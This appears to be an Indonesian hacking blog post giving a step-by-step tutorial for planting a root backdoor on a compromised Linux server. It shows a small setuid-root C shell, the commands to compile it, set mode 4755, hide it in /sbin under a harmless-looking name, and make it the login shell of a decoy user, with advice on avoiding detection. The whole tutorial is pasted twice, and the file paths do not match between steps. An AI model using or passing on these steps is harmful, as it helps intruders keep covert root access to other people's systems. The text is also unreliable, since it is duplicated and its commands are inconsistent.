Backdoor Root Shell <<< gw katakan demikian (ntah bener or kagak) karena yang akan gw gunakan adalah shell root itu sendiri sebagai backdoor yang akan menjadikan intruder mendapatkan akses root tanpa login sebagai root. "Root Shell" merupakan shell dengan akses setingkat root. User bukan root, akan mendapatkan akses root dengan menjalankan "root shell" ini. Tanpa butuh password root. Ketika berhasil mendapatkan root, sudah selayaknya kita menanam sebuah backdoor. But, backdoor yg sekrang sedang kita bicarakan, sedikit berbeda dengan backdoor lain. Gw anggep elu udah dapet root. entah gimana caranya, exploit, soceng, de el el. yg penting dpt root. yang akan di bahas hanya menanam backdoor. Backdoor yang lumayan aman adalah dengan membuat user baru. Dengan nama yang mirip dengan user2 yang sudah ada. Step by Step... />Buat user baru tanpa home dir
!~# useradd XterM
!~# passwd XterM
/> Buat sebuah intepreter shell dan beri akses privilege. berikut scriptnya :
-- rsh.c -- << terserah u lah int main(){ setregid(0,0); setreuid(0,0); setgroups(0,0); system("/bin/sh"); } /* << satu baris kosong. ini dibutuhkan */ --- selese ---- pendek kan. terserah mau km ketik trus upload sehingga tinggal wget aja or mo ketik langsung di shell juga gak apa apa. -> compile
!~# gcc -o /tmp/rsh rsh.c
-> beri privilege
!~# chown root:root /tmp/sh
!~# chmod 4755 /tmp/sh
/> pindahkan shell ke tempat yg aman. but dengan nama yang jangan mencurigakan. misal ke /sbin. karena dir ini jarang di lihat.
!~# mv /tmp/sh /sbin/besh
/> rubah shell intepreter user baru tadi ke shell baru kita
!~# nano /etc/passwd
cari user baru tadi. trus rubah shellnya ke /sbin/besh
seipppppp udah. simple banget ya.
saatnya di coba.
login ke ssh or apa aja ke shell kamu. dengan user baru tadi. secara otomatis, user tersebut langsung eksekusi /sbin/besh yang merupakan root shell.
So, jadilah backdoor yg mantavv. Dan berdoalah agar usr kamu tidak ketahuan dan tidak di hapus oleh root sesungguhnya... agar lebih mudah, scriptnya di upload aja dulu. tar tinggal wget langsung dari shell...
!~# useradd XterM
!~# passwd XterM
/> Buat sebuah intepreter shell dan beri akses privilege. berikut scriptnya :
-- rsh.c -- << terserah u lah int main(){ setregid(0,0); setreuid(0,0); setgroups(0,0); system("/bin/sh"); } /* << satu baris kosong. ini dibutuhkan */ --- selese ---- pendek kan. terserah mau km ketik trus upload sehingga tinggal wget aja or mo ketik langsung di shell juga gak apa apa. -> compile
!~# gcc -o /tmp/rsh rsh.c
-> beri privilege
!~# chown root:root /tmp/sh
!~# chmod 4755 /tmp/sh
/> pindahkan shell ke tempat yg aman. but dengan nama yang jangan mencurigakan. misal ke /sbin. karena dir ini jarang di lihat.
!~# mv /tmp/sh /sbin/besh
/> rubah shell intepreter user baru tadi ke shell baru kita
!~# nano /etc/passwd
cari user baru tadi. trus rubah shellnya ke /sbin/besh
seipppppp udah. simple banget ya.
saatnya di coba.
login ke ssh or apa aja ke shell kamu. dengan user baru tadi. secara otomatis, user tersebut langsung eksekusi /sbin/besh yang merupakan root shell.
So, jadilah backdoor yg mantavv. Dan berdoalah agar usr kamu tidak ketahuan dan tidak di hapus oleh root sesungguhnya... agar lebih mudah, scriptnya di upload aja dulu. tar tinggal wget langsung dari shell...
0 komentar:
Posting Komentar